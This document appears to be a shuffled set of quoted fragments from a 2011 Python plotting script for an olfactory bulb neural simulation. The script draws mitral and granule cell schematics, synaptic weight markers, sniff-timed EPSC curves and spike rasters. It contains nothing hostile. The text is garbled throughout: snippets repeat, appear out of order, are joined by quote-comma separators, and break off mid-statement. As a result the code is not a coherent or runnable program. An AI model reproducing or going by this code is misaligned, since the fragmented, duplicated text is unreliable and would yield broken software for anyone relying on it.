homedir def format_axes(ax, dt=1, ylim=(0.,4.)):", "> 0.0001: cellloc = 10+cellid*20 y = numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1))", "import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw)", "read_delayevents() dt = 1 tstop = xlim[1] x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt)", "raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width, pair[0], pair[1], fi))", "numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for i in range(5): data.append([]) for m in", "xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28,", "\\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for breath in breath_events:", "xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx", "tstop = xlim[1] x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP", "idx = 0 # for i in mask_a: # if i == 1:", "dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag", "markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns')", "homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18)", "microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path,", "1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\",", "marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc,", "fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0],", "'*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1", "redplt, blueplt], \\ ['sniff event', 'input onto red', 'input onto blue'], \\ bbox_to_anchor=(0,", "\\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break # Mark amplitude interval span = syn_ax.annotate('',", "horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center',", "ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break # Mark amplitude interval span =", "cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir']))", ".28, \\ 'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes =", "wts = read_weightevents() delays = read_delayevents() dt = 1 tstop = xlim[1] x", ") syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 - 250 ms', \\ horizontalalignment='center', verticalalignment='top', \\", "markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids,", "= syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) )", "== 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx += 1 idx = 0", "syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5,", "pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width, pair[0], pair[1], fi)) fig.savefig(os.path.join(analysis_path, 'fig1.pdf'))", "spikeplot from bulbspikes import * from neuronpy.util import spiketrain from params import sim_var", "ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M", "ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20 # Lateral dends y", "in breath_events: breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6)", "color=color, marker='1', markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax)", "Sun Mar 6 18:22:04 2011 @author: - \"\"\" import os import numpy from", "\\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center') # Mark delay interval for i in", "i in range(len(breath_events)): if breath_events[i] > 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data',", "if i == 1: if comp[idx] >= xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5,", "# stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1])", "yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color, linewidth=0.) # Glom ax.plot([xloc], [9],", "0 for i in mask_b: if i == 1: if comp[idx] >= xlim[0]", "neuronpy.util import spiketrain from params import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir", "magnitude') def draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20 # Lateral dends y =", "\\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids: wts", "textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 - 250 ms',", "comp[idx] >= xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\", "raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)',", "def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for i in range(5):", "import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.))", "horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes()", "\"\"\"Draw granule cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'],", "\\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids: wts = sws.m2g[cellid,:,0]", "'input onto red', 'input onto blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3,", "raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1],", "(ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure,", "'breathevents.txt')) wts = read_weightevents() delays = read_delayevents() dt = 1 tstop = xlim[1]", "syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue') for breath in breath_events: breathplt = syn_ax.plot([breath,", "draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0,", "+= 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5,", "backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20", "data[int(m[0])].append(m[1]) return data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for", "raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n", "dt = 1 tstop = xlim[1] x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1", "format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int))", "sws.parse_data(raw) for cellid in cellids: wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i", "handletextpad=.2) # Mark sniff interval for i in range(len(breath_events)): if breath_events[i] > xlim[0]:", "xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none')", "= (10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax", "horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath,", "ax, color='black'): xloc = 10+cellid*20 # Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec", "blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) #", "10+cellid*20 # Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec,", "cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5) #", "= numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec <", "markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2)", "in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)')", "ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\"", "= 0 for b in breath_events: if b >= tstop: break else: dtidx", "syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 - 250 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white')", "from bulbspikes import * from neuronpy.util import spiketrain from params import sim_var homedir", "spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft =", "sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\", "spiketrain.get_sync_traits(ref, comp, window=5) # idx = 0 # for i in mask_a: #", "# pos1 = (10+pair[0]*20, cluster_width, 1, pair) # pos2 = (10+pair[1]*20, cluster_width, 1,", "some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays", "range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def read_delayevents(): M =", "'(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for breath", "schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze an output file", "= [] for i in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return", "borderaxespad=0., handletextpad=.2) # Mark sniff interval for i in range(len(breath_events)): if breath_events[i] >", "\\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 - 250", "0.0001: cellloc = 10+cellid*20 y = numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1)) gloc", "+= 1 idx = 0 for i in mask_b: if i == 1:", "fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude')", "color=color, linewidth=0.) # Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9],", "18:22:04 2011 @author: - \"\"\" import os import numpy from matplotlib import pyplot", "fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath, breath], [ylim[0],", "sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i in range(len(wts)): if wts[i] > 0.0001: cellloc", "linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg =", "i in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def read_delayevents():", "= numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays = read_delayevents() dt = 1 tstop", "EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0 for b in breath_events: if", "xloc = 10+cellid*20 # Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1))", "ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx =", "sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid", "Analyze an output file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir,", "# if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx += 1", "numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids: wts = sws.m2g[cellid,:,0] wts", "verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025,", "= xlim[1] x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP =", "# idx = 0 # for i in mask_a: # if i ==", "bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark sniff", "coding: utf-8 -*- \"\"\" Created on Sun Mar 6 18:22:04 2011 @author: -", "-3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale,", "y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx =", "for i in range(len(breath_events)): if breath_events[i] > xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28),", "syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event', 'input onto", "ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color)", "draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20 # Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc))", "# Mark sniff interval for i in range(len(breath_events)): if breath_events[i] > xlim[0]: span", "syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2.,", "\\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\", "verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width,", "redplt = syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue') for breath in breath_events: breathplt", "pair) # pos2 = (10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags = numpy.ones(5)*.55 fig", "['sniff event', 'input onto red', 'input onto blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102),", "bulbspikes import * from neuronpy.util import spiketrain from params import sim_var homedir =", ">= tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt)", "\\ 'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes()", "ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)')", "0 for b in breath_events: if b >= tstop: break else: dtidx =", "sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False)", "granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos =", "leg = syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event', 'input onto red', 'input onto", "on Sun Mar 6 18:22:04 2011 @author: - \"\"\" import os import numpy", "comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20", "\\ spiketrain.get_sync_traits(ref, comp, window=5) # idx = 0 # for i in mask_a:", ">= xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center',", "#ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim)", "bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1]", "ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask,", "import spiketrain from params import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir def", "color='red') # idx += 1 idx = 0 for i in mask_b: if", "sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids: wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for", "dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt = syn_ax.plot(x,y0, color='red')", "def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width, 1, pair) #", "1., yvec).mask, \\ color=color, linewidth=0.) # Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white',", "interval for i in range(len(breath_events)): if breath_events[i] > xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i],", "syn_ax.plot(x,y1, color='blue') for breath in breath_events: breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \\", "Primary dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw", "break # Mark amplitude interval span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12),", "= gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue')", "ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5) # idx = 0 # for i", "5%', \\ horizontalalignment='left', verticalalignment='center') # Mark delay interval for i in range(len(breath_events)): if", "* from neuronpy.util import spiketrain from params import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path", "label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5)", "< 1., yvec).mask, \\ color=color, linewidth=0.) # Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10,", "textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center')", "color='black'): xloc = 10+cellid*20 # Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec =", "in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5,", "= numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0", "numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc],", "numpy from matplotlib import pyplot from neuronpy.graphics import spikeplot from bulbspikes import *", "blueplt], \\ ['sniff event', 'input onto red', 'input onto blue'], \\ bbox_to_anchor=(0, 1.15,", "syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event', 'input", ".5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\", "return data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width, 1,", "1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx += 1 idx = 0 for", "ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for i", "> xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\", "cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft,", "in mask_b: if i == 1: if comp[idx] >= xlim[0] and comp[idx] <", "\"\"\" import os import numpy from matplotlib import pyplot from neuronpy.graphics import spikeplot", "xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import", "in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def read_delayevents(): M", "idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim =", "breath], [0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft')", "\\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx =", "backgroundcolor='white') break # Mark amplitude interval span = syn_ax.annotate('', 